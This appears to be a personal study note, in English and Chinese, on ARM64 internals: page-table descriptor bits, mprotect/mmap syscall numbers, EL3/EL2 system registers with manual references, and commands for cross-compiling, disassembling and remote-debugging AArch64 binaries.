nT: Block translation entrynG: non-globalAF: access flagSH: 可分享性字段AP: Shareability fieldNS: Non-secure bit (NS)AttrIndx: Stage 1 memory attributes index field for the MAIR_ELx
SVC
| function | X8 | X0 | X1 | X2 | X3 |
|---|---|---|---|---|---|
| mprotect | 0xE2 | void *addr | size_t len | int prot | - |
| mmap | 0xDE | void *addr | size_t len | int prot | int flags |
Registers
MRS / MSR
-
MRS - P.1236
_ReadStatusRegin IDA
-
MSR -
_WriteStatusReg -
像是
INB,OUTB,INW,OUTWon x86 -
P. 3036
-
- (D13.2.118) SCTLR_EL3 - 6_1_0_0
- Provides top level control of the system, including its memory system, at EL3
- (D13.2.142) VBAR_EL3 - 6_12_0_0
- Holds the vector base address for any exception that is taken to EL3
- (D13.2.115) SCR_EL3 - 6_1_1_0
- Defines the configuration of the current Security state. It specifies
- The Security state of EL0, EL1, and EL2
- The Security state is either Secure or Non-secure
- The Execution state at lower Exception levels
- Whether IRQ, FIQ, SError interrupts, and External abort exceptions are taken to EL3
- Whether various operations are trapped to EL3
- Defines the configuration of the current Security state. It specifies
- (D13.3.18) MDCR_EL3 - 6_1_3_1
- Provides EL3 configuration options for self-hosted debug and the Performance Monitors Extension
- (D13.2.32) CPTR_EL3 - 6_1_1_2
- Controls trapping to EL3 of accesses to CPACR, CPACR_EL1, HCPTR, CPTR_EL2, trace, Activity Monitor, SVE, and Advanced SIMD and floating-point functionality.
- (D13.2.125) TCR_EL3
- The control register for stage 1 of the EL3 translation regime
- (D13.2.138) TTBR1_EL1 (Translation table (page table))
- Holds the base address of the translation table for the initial lookup for stage 1 of the translation of an address from the higher VA range in the EL1&0 stage 1 translation regime, and other information for this translation regime
- (D13.2.139) TTBR1_EL2
- HCR_EL2.E2H == 1
- holds the base address of the translation table for the initial lookup for stage 1 of the translation of an address from the higher VA range in the EL2&0 translation regime, and other information for this translation regime
- HCR_EL2.E2H == 0
- the contents of this register are ignored by the PE, except for a direct read or write of the register
- HCR_EL2.E2H == 1
- (D13.2.149) VTTBR_EL2
- Holds the base address of the translation table for the initial lookup for stage 2 of an address translation in the EL1&0 translation regime, and other information for this translation regime
- (D13.2.118) SCTLR_EL3 - 6_1_0_0
Install
# 64 bits
sudo apt install gcc-9-aarch64-linux-gnu
sudo apt install gcc-aarch64-linux-gnu
# 32 bits
sudo apt install gcc-arm-linux-gnueabihfdisassemble
# 64 bits
aarch64-linux-gnu-objdump -d ./bin
# 32 bits
arm-linux-gnueabi-objdump -d ./bindebug
gdb-multiarch -q -x script
# script
target remote :1234
# cmd
i r # 印出所有 register











